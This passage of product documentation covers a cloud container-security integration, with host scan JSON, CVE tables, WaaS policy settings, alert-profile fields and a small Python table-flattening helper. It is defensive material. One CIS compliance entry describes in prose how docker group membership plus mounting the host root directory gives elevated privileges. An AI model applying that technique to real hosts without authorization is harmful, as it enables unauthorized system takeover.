"fixDate": "",
"description": "Docker allows you to share a directory between the Docker host and a guest container\nwithout limiting the access rights of the container. This means that you can start a\ncontainer and map the / directory on your host to the container. The container will then be\nable to alter your host file system without any restrictions. In simple terms, it means that\nyou can attain elevated privileges with just being a member of the docker group and then\nstarting a container with mapped / directory on the host",
"link": "",
"cri": false,
"riskFactors": null,
"type": "host_config",
"packageName": "",
"functionLayer": "",
"published": 0,
"cve": ""
},
{
"templates": [
"PCI",
"HIPAA"
],
"vecStr": "",
"text": "",
"discovered": "0001-01-01T00:00:00Z",
"exploit": "",
"layerTime": 0,
"id": 21,
"severity": "high",
"title": "(CIS_Docker_v1.2.0 - 2.1) Restrict network traffic between containers",
"packageVersion": "",
"cause": "",
"cvss": 0,
"status": "",
"twistlock": false,
"fixDate": "",
"description": "By default, all network traffic is allowed between containers on the same host on the\ndefault network bridge. If not desired, restrict all the inter-container communication. Link\nspecific containers together that require communication. Alternatively, you can create\ncustom network and only join containers that need to communicate to that custom\nnetwork",
"link": "",
"cri": false,
"riskFactors": null,
"type": "daemon_config",
"packageName": "",
"functionLayer": "",
"published": 0,
"cve": ""
}
],
"repoTag": null,
"packageManager": true,
"repoDigests": [],
"allCompliance": {},
"packages": [
{
"pkgsType": "package",
"pkgs": [
{
"name": "kbd",
"version": "1.15.5-1ubuntu5",
"cveCount": 5,
"license": "GPL-2+",
"layerTime": 0
},
{
"name": "xdg-utils",
"version": "1.1.1-1ubuntu1.16.04.5",
"cveCount": 50,
"license": "",
"layerTime": 0
}
]
}
],
"complianceDistribution": {
"high": 16,
"total": 17,
"medium": 0,
"critical": 1,
"low": 0
},
"firewallProtection": {
"supported": false,
"enabled": false
},
"appEmbedded": false,
"installedProducts": {
"docker": "17.06.0-ce",
"osDistro": "xenial",
"hasPackageManager": true
},
"collections": [
"All",
"123",
"Test Collection"
],
"startupBinaries": [],
"type": "host",
"distro": "Ubuntu 16.04.2 LTS",
"files": [],
"scanID": 0,
"osDistro": "ubuntu",
"tags": [],
"Secrets": [],
"applications": [
{
"knownVulnerabilities": 20,
"path": "",
"version": "17.06.0-ce",
"layerTime": 0,
"name": "docker"
}
],
"osDistroRelease": "xenial",
"osDistroVersion": "16.04",
"trustStatus": "",
"firstScanTime": "0001-01-01T00:00:00Z",
"_id": "host123",
"riskFactors": {
"Remote execution": {},
"High severity": {},
"Has fix": {},
"Exploit exists": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {},
"Medium severity": {},
"DoS": {},
"Package in use": {}
},
"err": "",
"vulnerabilitiesCount": 191,
"scanTime": "2021-12-15T14:19:48.792Z",
"complianceIssuesCount": 17,
"hostDevices": [
{
"ip": "1.1.1.1",
"name": "eth0"
}
],
"vulnerabilities": [
{
"templates": null,
"vecStr": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"text": "",
"discovered": "2020-11-04T18:15:00Z",
"exploit": "",
"layerTime": 0,
"id": 46,
"applicableRules": [
"*"
],
"severity": "low",
"title": "",
"packageVersion": "4.9.3-0ubuntu0.16.04.1",
"cause": "",
"cvss": 7.5,
"status": "needed",
"twistlock": false,
"fixDate": "",
"description": "The ppp decapsulator in tcpdump 4.9.3 can be convinced to allocate a large amount of memory.",
"link": "https://people.canonical.com/~ubuntu-security/cve/2020/CVE-2020-8037",
"cri": false,
"riskFactors": {
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {}
},
"type": "image",
"packageName": "tcpdump",
"functionLayer": "",
"published": 1604513700,
"cve": "CVE-2020-8037"
},
{
"templates": null,
"vecStr": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"text": "",
"discovered": "2021-04-29T05:15:00Z",
"exploit": "",
"layerTime": 0,
"id": 46,
"applicableRules": [
"*"
],
"severity": "medium",
"title": "",
"packageVersion": "1.17.1-1ubuntu1.5",
"cause": "",
"cvss": 6.1,
"status": "deferred",
"twistlock": false,
"fixDate": "",
"description": "GNU Wget through 1.21.1 does not omit the Authorization header upon a redirect to a different origin, a related issue to CVE-2018-1000007.",
"link": "https://people.canonical.com/~ubuntu-security/cve/2021/CVE-2021-31879",
"cri": false,
"riskFactors": {
"Medium severity": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {}
},
"type": "image",
"packageName": "wget",
"functionLayer": "",
"published": 1619673300,
"cve": "CVE-2021-31879"
}
],
"hosts": {},
"complianceRiskScore": 1160000,
"wildFireUsage": null,
"binaries": [
{
"services": [
"lxcfs"
],
"path": "/usr/bin/lxcfs",
"cveCount": 0,
"name": "lxcfs",
"md5": ""
},
{
"services": [
"systemd-udevd"
],
"path": "/lib/systemd/systemd-udevd",
"cveCount": 0,
"name": "systemd-udevd",
"md5": ""
}
],
"vulnerabilityRiskScore": 47909,
"history": []
}
}
}

Human Readable Output#

Host description#

| Hostname | Docker Version | OS Distribution | Vulnerabilities Count | Compliance Issues Count |
| --- | --- | --- | --- | --- |
| host123 | 17.06.0-ce | Ubuntu 16.04.2 LTS | 191 | 17 |

Vulnerabilities#

| Cve | Description | Severity | Package Name | Status |
| --- | --- | --- | --- | --- |
| CVE-2020-8037 | The ppp decapsulator in tcpdump 4.9.3 can be convinced to allocate a large amount of memory. | low | tcpdump | needed |
| CVE-2021-31879 | GNU Wget through 1.21.1 does not omit the Authorization header upon a redirect to a different origin, a related issue to CVE-2018-1000007. | medium | wget | deferred |

Compliances#

| Id | Severity | Description |
| --- | --- | --- |
| 16 | high | Docker allows you to share a directory between the Docker host and a guest container without limiting the access rights of the container. This means that you can start a container and map the / directory on your host to the container. The container will then be able to alter your host file system without any restrictions. In simple terms, it means that you can attain elevated privileges with just being a member of the docker group and then starting a container with mapped / directory on the host |
| 21 | high | By default, all network traffic is allowed between containers on the same host on the default network bridge. If not desired, restrict all the inter-container communication. Link specific containers together that require communication. Alternatively, you can create custom network and only join containers that need to communicate to that custom network |

Command Example#

!prisma-cloud-compute-hosts-scan-list hostname=host123 compact=true limit_stats=2

Context Example#

{
"PrismaCloudCompute": {
"ReportHostScan": {
"cloudMetadata": {
"resourceID": "i-123",
"image": "ami-123",
"provider": "aws",
"type": "t2.large",
"region": "eu-west-123",
"accountID": "123"
},
"hostname": "host123",
"vulnerabilityDistribution": {
"high": 4,
"total": 191,
"medium": 78,
"critical": 0,
"low": 109
},
"creationTime": "0001-01-01T00:00:00Z",
"image": {
"created": "0001-01-01T00:00:00Z"
},
"labels": [
"osDistro:ubuntu",
"osVersion:16.04"
],
"instances": [],
"complianceIssues": null,
"repoTag": null,
"packageManager": false,
"repoDigests": [],
"allCompliance": {},
"packages": null,
"complianceDistribution": {
"high": 16,
"total": 17,
"medium": 0,
"critical": 1,
"low": 0
},
"firewallProtection": {
"supported": false,
"enabled": false
},
"appEmbedded": false,
"installedProducts": {
"docker": "17.06.0-ce",
"osDistro": "xenial",
"hasPackageManager": true
},
"collections": [
"All",
"123",
"Test Collection"
],
"startupBinaries": null,
"type": "host",
"distro": "Ubuntu 16.04.2 LTS",
"files": null,
"scanID": 0,
"osDistro": "ubuntu",
"tags": [],
"Secrets": null,
"osDistroRelease": "xenial",
"osDistroVersion": "",
"trustStatus": "",
"firstScanTime": "0001-01-01T00:00:00Z",
"_id": "host123",
"riskFactors": {
"Remote execution": {},
"High severity": {},
"Has fix": {},
"Exploit exists": {},
"Attack complexity: low": {},
"Recent vulnerability": {},
"Attack vector: network": {},
"Medium severity": {},
"DoS": {},
"Package in use": {}
},
"err": "",
"vulnerabilitiesCount": 191,
"scanTime": "2021-12-15T14:19:48.792Z",
"complianceIssuesCount": 17,
"hostDevices": [
{
"ip": "1.1.1.1",
"name": "eth0"
}
],
"vulnerabilities": null,
"hosts": {},
"complianceRiskScore": 1160000,
"wildFireUsage": null,
"binaries": null,
"vulnerabilityRiskScore": 47909,
"history": null
}
}
}

Human Readable Output#

Host description#

| Hostname | OS Distribution | Vulnerabilities Count | Compliance Issues Count |
| --- | --- | --- | --- |
| host123 | Ubuntu 16.04.2 LTS | 191 | 17 |

Vulnerability Statistics#

| Critical | High | Medium | Low |
| --- | --- | --- | --- |
| 0 | 4 | 78 | 109 |

Compliance Statistics#

| Critical | High | Medium | Low |
| --- | --- | --- | --- |
| 1 | 16 | 0 | 0 |

prisma-cloud-compute-vulnerabilities-impacted-resources-list#


Get the list of resources (hosts and images) impacted by the given Prisma Cloud Compute vulnerabilities.

Base Command#

prisma-cloud-compute-vulnerabilities-impacted-resources-list

Requires Role#

vulnerabilityManager

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| cve | Comma-separated list of CVEs IDs that can be used as a pivot for the impacted resource search. For example cve=CVE-2018-14600,CVE-2021-31535. | Optional |
| limit | The maximum records of impacted hosts/images to return. Default is 50. | Optional |
| offset | The offset by which to begin listing impacted hosts/images records. Default is 0. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.VulnerabilitiesImpactedResource._id | String | The CVE ID. (The index for the impacted resources). |
| PrismaCloudCompute.VulnerabilitiesImpactedResource.functions | Unknown | The mapping between the function ID and its details. |
| PrismaCloudCompute.VulnerabilitiesImpactedResource.hosts | String | The list of impacted hosts. |
| PrismaCloudCompute.VulnerabilitiesImpactedResource.riskTree | Unknown | The risk tree associated with the CVE ID. |

Command Example#

!prisma-cloud-compute-vulnerabilities-impacted-resources-list cve=CVE-2021-31535,CVE-2018-14600

Context Example#

{
"PrismaCloudCompute": {
"VulnerabilitiesImpactedResource": [
{
"_id": "CVE-2021-31535",
"hosts": [
"host1"
],
"riskTree": {
"sha256:c24dea8ef267038c3c1d64b66c7cd660df85563146af841c1b452b291093abdf": [
{
"image": "image1",
"factors": {}
}
],
"sha256:dccfc7e8628161ff6f859cb74aa9de07f1b2650554532b6103658d8831e6991f": [
{
"image": "image2",
"factors": {}
}
]
}
},
{
"_id": "CVE-2018-14600",
"riskTree": {
"sha256:c24dea8ef267038c3c1d64b66c7cd660df85563146af841c1b452b291093abdf": [
{
"image": "image3",
"factors": {}
}
],
"sha256:dccfc7e8628161ff6f859cb74aa9de07f1b2650554532b6103658d8831e6991f": [
{
"image": "image4",
"factors": {}
}
]
}
}
]
}
}

Human Readable Output#

Impacted Images#

| Cve | Image |
| --- | --- |
| CVE-2021-31535 | image1 |
| CVE-2021-31535 | image2 |
| CVE-2018-14600 | image3 |
| CVE-2018-14600 | image4 |

Impacted Hosts#

| Cve | Hostname |
| --- | --- |
| CVE-2021-31535 | host1 |
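The VulnerabilitiesImpactedResource context above nests images under the image digest inside riskTree, and omits the hosts key entirely when a CVE impacts no host (as for CVE-2018-14600). As an added example, not part of the integration, this script flattens such a context into the two Human Readable tables and also pivots it by digest; IMPACTED is a constructed copy of the context above.

```python
"""Flatten PrismaCloudCompute.VulnerabilitiesImpactedResource into the
'Impacted Images' and 'Impacted Hosts' tables shown above.

Added example, not part of the integration. IMPACTED is a constructed copy of
the CVE-2021-31535 / CVE-2018-14600 context above: riskTree is keyed by image
digest, and the hosts key is simply absent when no host is impacted.
"""
from typing import Any, Dict, List, Sequence, Tuple

DIGEST_A = "sha256:c24dea8ef267038c3c1d64b66c7cd660df85563146af841c1b452b291093abdf"
DIGEST_B = "sha256:dccfc7e8628161ff6f859cb74aa9de07f1b2650554532b6103658d8831e6991f"

IMPACTED: List[Dict[str, Any]] = [
    {
        "_id": "CVE-2021-31535",
        "hosts": ["host1"],
        "riskTree": {
            DIGEST_A: [{"image": "image1", "factors": {}}],
            DIGEST_B: [{"image": "image2", "factors": {}}],
        },
    },
    {
        "_id": "CVE-2018-14600",  # no "hosts" key: only images are impacted
        "riskTree": {
            DIGEST_A: [{"image": "image3", "factors": {}}],
            DIGEST_B: [{"image": "image4", "factors": {}}],
        },
    },
]


def impacted_images(resources: Sequence[Dict[str, Any]]) -> List[Tuple[str, str]]:
    """(cve, image) rows in first-seen order, one row per distinct pair."""
    rows: List[Tuple[str, str]] = []
    seen = set()
    for res in resources:
        cve = res["_id"]
        for entries in (res.get("riskTree") or {}).values():
            for entry in entries or []:
                image = entry.get("image")
                if image and (cve, image) not in seen:
                    seen.add((cve, image))
                    rows.append((cve, image))
    return rows


def impacted_hosts(resources: Sequence[Dict[str, Any]]) -> List[Tuple[str, str]]:
    """(cve, hostname) rows; a missing or null hosts key contributes no rows."""
    return [(res["_id"], host) for res in resources for host in (res.get("hosts") or [])]


def cves_by_digest(resources: Sequence[Dict[str, Any]]) -> Dict[str, List[str]]:
    """Pivot the other way: for each image digest, which of the queried CVEs hit it."""
    out: Dict[str, List[str]] = {}
    for res in resources:
        for digest in (res.get("riskTree") or {}):
            hits = out.setdefault(digest, [])
            if res["_id"] not in hits:
                hits.append(res["_id"])
    return out


def cves_for_image(resources: Sequence[Dict[str, Any]], image: str) -> List[str]:
    """All queried CVEs that list the given image name in their riskTree."""
    return [cve for cve, img in impacted_images(resources) if img == image]


def render_table(headers: Sequence[str], rows: Sequence[Sequence[Any]]) -> str:
    """Markdown table in the shape of the Human Readable Output sections."""
    lines = ["| " + " | ".join(headers) + " |", "|" + "---|" * len(headers)]
    lines += ["| " + " | ".join(str(cell) for cell in row) + " |" for row in rows]
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_table(["Cve", "Image"], impacted_images(IMPACTED)))
    print(render_table(["Cve", "Hostname"], impacted_hosts(IMPACTED)))
    print(render_table(["Digest", "CVEs"], [(d, ", ".join(c)) for d, c in cves_by_digest(IMPACTED).items()]))
```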

prisma-cloud-compute-get-waas-policies#


Get the WaaS container policies from Defend > WAAS > Containers.

Base Command#

prisma-cloud-compute-get-waas-policies

Input#

| Argument Name | Description | Required |
| --- | --- | --- |

There are no input arguments for this command.

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.Policies.Name | String | The WaaS policy name. |
| PrismaCloudCompute.Policies.WaasPolicy.ATP | String | The list of WaaS policies and their current setting. |
| PrismaCloudCompute.Policies.WaasPolicy.CodeInjection | String | The list of WaaS policies and their current setting. |
| PrismaCloudCompute.Policies.WaasPolicy.SQLInjection | String | The list of WaaS policies and their current setting. |
| PrismaCloudCompute.Policies.WaasPolicy.DetectInformationLeakage | String | The list of WaaS policies and their current setting. |
| PrismaCloudCompute.Policies.WaasPolicy.CrossSiteScriptingXSS | String | The list of WaaS policies and their current setting. |
| PrismaCloudCompute.Policies.WaasPolicy.OSCommandInjetion | String | The list of WaaS policies and their current setting. |
| PrismaCloudCompute.Policies.WaasPolicy.AttackToolsAndVulnScanners | String | The list of WaaS policies and their current setting. |
| PrismaCloudCompute.Policies.WaasPolicy.LocalFileInclusion | String | The list of WaaS policies and their current setting. |
| PrismaCloudCompute.Policies.WaasPolicy.Shellshock | String | The list of WaaS policies and their current setting. |
| PrismaCloudCompute.Policies.WaasPolicy.MalformedHTTPRequest | String | The list of WaaS policies and their current setting. |

Command example#

!prisma-cloud-compute-get-waas-policies

Context Example#

{
"PrismaCloudCompute": {
"Policies": {
"Name": "dvwa",
"WaasPolicy": [
{
"ATP": "alert",
"AttackToolsAndVulnScanners": "alert",
"CodeInjection": "alert",
"CrossSiteScriptingXSS": "alert",
"DetectInformationLeakage": "alert",
"LocalFileInclusion": "alert",
"MalformedHTTPRequest": "alert",
"OSCommandInjetion": "alert",
"SQLInjection": "ban",
"Shellshock": "alert"
}
]
}
}
}

Human Readable Output#

dvwa#

| ATP | AttackToolsAndVulnScanners | CodeInjection | CrossSiteScriptingXSS | DetectInformationLeakage | LocalFileInclusion | MalformedHTTPRequest | OSCommandInjetion | SQLInjection | Shellshock |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| alert | alert | alert | alert | alert | alert | alert | alert | ban | alert |

prisma-cloud-compute-update-waas-policies#


Update the WaaS policy for containers.

Base Command#

prisma-cloud-compute-update-waas-policies

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| policy | The complete policy object. Get it by running prisma-cloud-compute-get-waas-policies raw-response=true extend-context=PCC=. | Required |
| attack_type | The specific policy to update. Possible values are: sqli, xss, cmdi, codeInjection, lfi, attackTools, shellshock, malformedReq, advancedProtectionEffect, intelGathering. | Required |
| action | The new policy action for the attack type. Possible values are: ban, prevent, alert, allow, disable, reCAPTCHA. | Required |
| rule_name | The rule name for the WaaS policy settings. | Required |

Context Output#

There is no context output for this command.

Human Readable Output#

Successfully updated the WaaS policy

prisma-cloud-compute-get-audit-firewall-container-alerts#


Get the audit alerts for the container firewall (WaaS) policies.

Base Command#

prisma-cloud-compute-get-audit-firewall-container-alerts

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| ImageName | The image name to get the alerts for. | Required |
| FromDays | The number of days back to look. | Optional |
| audit_type | The type of audit alert to retrieve. | Required |

Context Output#

There is no context output for this command.

Command example#

!prisma-cloud-compute-get-audit-firewall-container-alerts audit_type=lfi ImageName=vulnerables/web-dvwa:latest

Human Readable Output#

Audits#

No entries.

Known limitations:#

When fetching an incident from the Prisma Cloud Compute platform, the platform will delete the fetched incident. Therefore, it is recommended to configure only one instance per user to fetch incidents.

prisma-cloud-compute-get-alert-profiles#


Get the available alert profiles from a specific project.

Base Command#

prisma-cloud-compute-get-alert-profiles

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| project | The project to get the alert profiles for. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.AlertProfiles.Cortex.Application | String | The alert profile application. |
| PrismaCloudCompute.AlertProfiles.Cortex.CredentialId | String | The credential ID. |
| PrismaCloudCompute.AlertProfiles.Cortex.Enabled | Boolean | Whether the alert profile is enabled. |
| PrismaCloudCompute.AlertProfiles.Cortex.Url | String | The alert profile URL. |
| PrismaCloudCompute.AlertProfiles.Email.CredentialId | String | The alert profile credential ID. |
| PrismaCloudCompute.AlertProfiles.Email.Enabled | Boolean | The email setting for the alert profile. |
| PrismaCloudCompute.AlertProfiles.Email.From | String | The from setting for the email profile. |
| PrismaCloudCompute.AlertProfiles.Email.Port | Number | The email alert profile port. |
| PrismaCloudCompute.AlertProfiles.Email.SmtpAddress | String | The SMTP address. |
| PrismaCloudCompute.AlertProfiles.Email.Ssl | Boolean | The email alert profile SSL. |
| PrismaCloudCompute.AlertProfiles.GcpPubsub.CredentialId | String | The credential ID. |
| PrismaCloudCompute.AlertProfiles.GcpPubsub.Enabled | Boolean | Whether the GCP Pub Sub is enabled. |
| PrismaCloudCompute.AlertProfiles.GcpPubsub.Topic | String | The GCP Pub Sub topic. |
| PrismaCloudCompute.AlertProfiles.Jira.BaseUrl | String | The Jira base URL. |
| PrismaCloudCompute.AlertProfiles.Jira.CaCert | String | The Jira CA Cert. |
| PrismaCloudCompute.AlertProfiles.Jira.CredentialId | String | The Jira credential ID. |
| PrismaCloudCompute.AlertProfiles.Jira.Enabled | Boolean | Jira alert profile status. |
| PrismaCloudCompute.AlertProfiles.Jira.IssueType | String | The Jira issue type. |
| PrismaCloudCompute.AlertProfiles.Jira.Priority | String | The Jira priority. |
| PrismaCloudCompute.AlertProfiles.LastError | String | The last error. |
| PrismaCloudCompute.AlertProfiles.Modified | Date | The modified time. |
| PrismaCloudCompute.AlertProfiles.Name | String | The alert profile name. |
| PrismaCloudCompute.AlertProfiles.Owner | String | The alert profile owner. |
| PrismaCloudCompute.AlertProfiles.Pagerduty.RoutingKey.Encrypted | String | The PagerDuty routing key encryption status. |
| PrismaCloudCompute.AlertProfiles.Pagerduty.Severity | String | The PagerDuty severity. |
| PrismaCloudCompute.AlertProfiles.Pagerduty.Summary | String | The PagerDuty summary. |
| PrismaCloudCompute.AlertProfiles.Policy.Admission.AllRules | Boolean | The policy all rules. |
| PrismaCloudCompute.AlertProfiles.Policy.Admission.Enabled | Boolean | Whether the admission is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.AgentlessAppFirewall.AllRules | Boolean | The agentless app firewall rules. |
| PrismaCloudCompute.AlertProfiles.Policy.AgentlessAppFirewall.Enabled | Boolean | Whether the agentless app firewall is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.AppEmbeddedAppFirewall.AllRules | Boolean | App embedded firewall rules. |
| PrismaCloudCompute.AlertProfiles.Policy.AppEmbeddedAppFirewall.Enabled | Boolean | Whether the app embedded firewall is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.AppEmbeddedRuntime.AllRules | Boolean | App embedded runtime rules. |
| PrismaCloudCompute.AlertProfiles.Policy.AppEmbeddedRuntime.Enabled | Boolean | Whether the app embedded runtime is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.CloudDiscovery.AllRules | Boolean | The cloud discovery rules. |
| PrismaCloudCompute.AlertProfiles.Policy.CloudDiscovery.Enabled | Boolean | Whether the cloud discovery is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.CodeRepoVulnerability.AllRules | Boolean | The code repo vulnerability rules. |
| PrismaCloudCompute.AlertProfiles.Policy.CodeRepoVulnerability.Enabled | Boolean | Whether the code repo vulnerability is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerAppFirewall.AllRules | Boolean | The container app firewall rules. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerAppFirewall.Enabled | Boolean | Whether the container app firewall is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerCompliance.AllRules | Boolean | The container compliance rules. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerCompliance.Enabled | Boolean | Whether the container compliance is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerComplianceScan.AllRules | Boolean | The container compliance scan rules. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerComplianceScan.Enabled | Boolean | Whether the container compliance scan is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerRuntime.AllRules | Boolean | The container runtime rules. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerRuntime.Enabled | Boolean | Whether the container runtime is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerVulnerability.AllRules | Boolean | The container vulnerability rules. |
| PrismaCloudCompute.AlertProfiles.Policy.ContainerVulnerability.Enabled | Boolean | Whether the container vulnerability is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.Defender.AllRules | Boolean | The Defender policy rules. |
| PrismaCloudCompute.AlertProfiles.Policy.Defender.Enabled | Boolean | Whether the Defender policy is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.Docker.AllRules | Boolean | The Docker rules. |
| PrismaCloudCompute.AlertProfiles.Policy.Docker.Enabled | Boolean | Whether the Docker rules are enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.HostAppFirewall.AllRules | Boolean | The app host firewall rules. |
| PrismaCloudCompute.AlertProfiles.Policy.HostAppFirewall.Enabled | Boolean | Whether the host app firewall is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.HostCompliance.AllRules | Boolean | The host compliance rules. |
| PrismaCloudCompute.AlertProfiles.Policy.HostCompliance.Enabled | Boolean | Whether the host compliance is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.HostComplianceScan.AllRules | Boolean | The host compliance scan rules. |
| PrismaCloudCompute.AlertProfiles.Policy.HostComplianceScan.Enabled | Boolean | Whether the host compliance scan is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.HostRuntime.AllRules | Boolean | The host runtime rules. |
| PrismaCloudCompute.AlertProfiles.Policy.HostRuntime.Enabled | Boolean | Whether the host runtime rules are enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.HostVulnerability.AllRules | Boolean | The host vulnerability rules. |
| PrismaCloudCompute.AlertProfiles.Policy.HostVulnerability.Enabled | Boolean | Whether the host vulnerability rule is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.Incident.AllRules | Boolean | The policy incident rules. |
| PrismaCloudCompute.AlertProfiles.Policy.Incident.Enabled | Boolean | Whether the policy incident is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.KubernetesAudit.AllRules | Boolean | The K8S rules. |
| PrismaCloudCompute.AlertProfiles.Policy.KubernetesAudit.Enabled | Boolean | Whether K8S is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.NetworkFirewall.AllRules | Boolean | The network firewall rules. |
| PrismaCloudCompute.AlertProfiles.Policy.NetworkFirewall.Enabled | Boolean | Whether the network firewall rule is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.RegistryVulnerability.AllRules | Boolean | The registry vulnerability rules. |
| PrismaCloudCompute.AlertProfiles.Policy.RegistryVulnerability.Enabled | Boolean | Whether the registry vulnerability rule is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.ServerlessAppFirewall.AllRules | Boolean | The serverless app firewall rules. |
| PrismaCloudCompute.AlertProfiles.Policy.ServerlessAppFirewall.Enabled | Boolean | Whether the serverless app firewall rule is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.ServerlessRuntime.AllRules | Boolean | The serverless runtime rules. |
| PrismaCloudCompute.AlertProfiles.Policy.ServerlessRuntime.Enabled | Boolean | Whether the serverless runtime rule is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.VmCompliance.AllRules | Boolean | The VM compliance rules. |
| PrismaCloudCompute.AlertProfiles.Policy.VmCompliance.Enabled | Boolean | Whether the VM compliance rule is enabled. |
| PrismaCloudCompute.AlertProfiles.Policy.VmVulnerability.AllRules | Boolean | The VM vulnerability rules. |
| PrismaCloudCompute.AlertProfiles.Policy.VmVulnerability.Enabled | Boolean | Whether the VM vulnerability rules are enabled. |
PrismaCloudCompute.AlertProfiles.Policy.WaasHealth.AllRulesBooleanThe WAAS health rules.
PrismaCloudCompute.AlertProfiles.Policy.WaasHealth.EnabledBooleanWhether the WAAS health rules are enabled.
PrismaCloudCompute.AlertProfiles.PreviousNameStringThe alert profile previous name.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.CredentialIDStringThe security advisor credential ID.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.EnabledBooleanWhether the security advisor is enabled.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.FindingsURLStringThe security advisor findings URL.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.ProviderIdStringThe security advisor provider ID.
PrismaCloudCompute.AlertProfiles.SecurityAdvisor.TokenURLStringThe security advisor token URL.
PrismaCloudCompute.AlertProfiles.SecurityCenter.CredentialIdStringThe security center crendential ID.
PrismaCloudCompute.AlertProfiles.SecurityCenter.EnabledBooleanWhether the security center is enabled.
PrismaCloudCompute.AlertProfiles.SecurityCenter.SourceIDStringThe security center source ID.
PrismaCloudCompute.AlertProfiles.SecurityHub.AccountIDStringThe security hub account ID.
PrismaCloudCompute.AlertProfiles.SecurityHub.CredentialIdStringThe security hub credential ID.
PrismaCloudCompute.AlertProfiles.SecurityHub.EnabledBooleanWhether the security hub is enabled.
PrismaCloudCompute.AlertProfiles.SecurityHub.RegionStringThe security hub region.
PrismaCloudCompute.AlertProfiles.ServiceNow.ApplicationStringThe ServiceNow application.
PrismaCloudCompute.AlertProfiles.ServiceNow.AssigneeStringThe ServiceNow assignee.
PrismaCloudCompute.AlertProfiles.ServiceNow.CredentialIDStringThe ServiceNow credential ID.
PrismaCloudCompute.AlertProfiles.ServiceNow.ProjectStringThe ServiceNow project.
PrismaCloudCompute.AlertProfiles.Slack.EnabledBooleanWhether the Slack alert profile is enabled.
PrismaCloudCompute.AlertProfiles.Slack.WebhookUrlStringThe Slack URL.
PrismaCloudCompute.AlertProfiles.Splunk.AuthToken.EncryptedStringThe Splunk auth token.
PrismaCloudCompute.AlertProfiles.Splunk.SourceTypeStringThe Splunk source type.
PrismaCloudCompute.AlertProfiles.Splunk.UrlStringThe Splunk URL.
PrismaCloudCompute.AlertProfiles.VulnerabilityImmediateAlertsEnabledBooleanWhether the vulnerability alert is enabled.
PrismaCloudCompute.AlertProfiles.Webhook.CredentialIdStringThe webhook credential ID.
PrismaCloudCompute.AlertProfiles.Webhook.UrlStringThe webhook URL.
PrismaCloudCompute.AlertProfiles._IdStringThe alert profile ID.

Command example

```
!prisma-cloud-compute-get-alert-profiles
```

Context Example

```json
{
  "PrismaCloudCompute": {
    "AlertProfiles": {
      "Cortex": {
        "Application": "xsoar",
        "CredentialId": "",
        "Enabled": true,
        "Url": ""
      },
      "Email": {
        "CredentialId": "",
        "Enabled": false,
        "From": "",
        "Port": 0,
        "SmtpAddress": "",
        "Ssl": false
      },
      "GcpPubsub": {
        "CredentialId": "",
        "Enabled": false,
        "Topic": ""
      },
      "Jira": {
        "Assignee": {},
        "BaseUrl": "",
        "CaCert": "",
        "CredentialId": "",
        "Enabled": false,
        "IssueType": "",
        "Labels": {},
        "Priority": "",
        "ProjectKey": {}
      },
      "LastError": "",
      "Modified": "2023-04-03T18:43:05.575Z",
      "Name": "XSOAR",
      "Owner": "admin",
      "Pagerduty": {
        "RoutingKey": {
          "Encrypted": ""
        },
        "Severity": "",
        "Summary": ""
      },
      "Policy": {
        "Admission": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "AgentlessAppFirewall": {
          "AllRules": true,
          "Enabled": true,
          "Rules": []
        },
        "AppEmbeddedAppFirewall": {
          "AllRules": true,
          "Enabled": true,
          "Rules": []
        },
        "AppEmbeddedRuntime": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "CloudDiscovery": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "CodeRepoVulnerability": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "ContainerAppFirewall": {
          "AllRules": true,
          "Enabled": true,
          "Rules": []
        },
        "ContainerCompliance": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "ContainerComplianceScan": {
          "AllRules": true,
          "Enabled": false,
          "Rules": []
        },
        "ContainerRuntime": {
          "AllRules": true,
